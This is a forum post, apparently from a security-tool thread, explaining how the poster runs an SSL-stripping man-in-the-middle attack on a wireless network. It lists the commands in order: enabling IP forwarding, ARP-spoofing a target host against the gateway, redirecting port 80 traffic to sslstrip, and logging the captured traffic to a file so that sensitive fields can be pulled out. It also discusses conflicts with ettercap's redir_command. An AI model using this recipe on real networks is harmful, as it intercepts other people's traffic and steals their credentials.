if we are using sslstrip why uncoment redir_command? that command is supposed to sniff ssl traffic and if we already using sslstrip, that will bring conflicts between the two right? Maybe because of that, many of people here are having problems with messages saying cert isnt valid (because is how redir_command works to get ssl info, from what i know).
Originally Posted by g0tmi1k
Also Eterrcap forwards all traffic automatically if sniffing, i dont know any command to make it stop doing that, wich means if we have ip_forward=1 and eterrcap running, we are forwarding traffic x2 times(you can confirm in wireshark). not pretty
If i use sslstrip i do just this:
then just open the file and seek for important fields, its not difficult.
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -w sslsniff.txt (so it write to file)
Note that to flush iptables, the command
will not work, (at least for me).
You got to use
iptables -t nat --flush